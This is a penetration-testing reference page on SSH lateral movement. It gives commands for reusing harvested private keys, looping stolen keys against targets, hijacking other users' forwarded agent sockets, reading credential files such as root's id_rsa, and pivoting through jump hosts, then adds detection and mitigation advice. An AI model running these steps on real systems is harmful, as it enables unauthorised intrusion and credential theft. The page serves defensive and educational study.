SSH Lateral Movement
Overview
SSH (TCP 22) is the primary remote administration protocol on Linux and Unix systems. After harvesting SSH keys, passwords, or Kerberos tickets, lateral movement via SSH provides interactive shell access to additional hosts. SSH keys found on compromised systems often grant access to multiple servers — a single private key can unlock an entire infrastructure.
ATT&CK Mapping
- Tactic: TA0008 - Lateral Movement
- Technique: T1021.004 - Remote Services: SSH
Prerequisites
- SSH credentials (password, private key, or Kerberos ticket)
- Network access to target TCP 22
Techniques
Password Authentication
ssh <user>@<target>
ssh -p <port> <user>@<target>
Key-Based Authentication
# Using a harvested private key
ssh -i /path/to/id_rsa <user>@<target>
# Fix key permissions if needed
chmod 600 /path/to/id_rsa
ssh -i /path/to/id_rsa <user>@<target>
# Test multiple keys
for key in $(find /home/ -name "id_rsa" -o -name "id_ed25519" 2>/dev/null); do
echo "Testing $key on $target..."
ssh -i "$key" -o BatchMode=yes -o ConnectTimeout=3 <user>@<target> 'hostname' 2>/dev/null && echo "SUCCESS: $key"
done
SSH Agent Forwarding Hijacking
If a user has SSH agent forwarding enabled (ssh -A), their agent socket is accessible on the remote host. Any user with access to that socket can use the forwarded keys:
# Find SSH agent sockets
find /tmp -name "agent.*" -type s 2>/dev/null
ls -la /tmp/ssh-*/agent.* 2>/dev/null
# Use another user's agent socket (requires access to the socket)
export SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXX/agent.XXXX
ssh-add -l # List loaded keys
ssh <user>@<next_target> # Use the forwarded key
SSH Key Discovery and Reuse
# Check all user home directories for SSH keys
find /home/ -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" 2>/dev/null
cat /root/.ssh/id_rsa 2>/dev/null
# Check known_hosts for potential targets
cat ~/.ssh/known_hosts 2>/dev/null
# known_hosts may be hashed — cannot always read hostnames
# Check authorized_keys for clues about other systems
cat ~/.ssh/authorized_keys 2>/dev/null
# Comments may reveal usernames and hostnames: "user@other-server"
# Check SSH config for configured hosts
cat ~/.ssh/config 2>/dev/null
# May reveal hostnames, usernames, and key paths
ProxyJump (SSH Pivoting)
SSH through an intermediate host to reach systems on internal networks:
# ProxyJump (-J flag)
ssh -J <jump_user>@<jump_host> <target_user>@<target>
# Multiple jumps
ssh -J <jump1_user>@<jump1>,<jump2_user>@<jump2> <target_user>@<target>
# ProxyCommand (older method)
ssh -o ProxyCommand="ssh -W %h:%p <jump_user>@<jump_host>" <target_user>@<target>
SSH with Kerberos
# If Kerberos ticket is cached
export KRB5CCNAME=/tmp/krb5cc_target
ssh -o GSSAPIAuthentication=yes <user>@<target>
Detection Methods
Network-Based Detection
- SSH connections from servers that don't normally initiate SSH (servers are usually targets, not sources)
- SSH connections using keys not associated with automation/management accounts
Host-Based Detection
auth.logentries showing key-based authentication from unexpected sources- SSH agent socket access by non-owner processes
- New entries in
~/.ssh/authorized_keys(persistence indicator) - SSH connections at unusual times or from unusual source IPs
Mitigation Strategies
- Disable agent forwarding — set
AllowAgentForwarding noinsshd_configunless specifically needed - Use SSH certificates — rotate and audit key-based access centrally
- Restrict SSH access — limit which users and source IPs can connect via
AllowUsersand firewall rules - Monitor authorized_keys — alert on changes to authorized_keys files
- Key passphrase enforcement — protect private keys with passphrases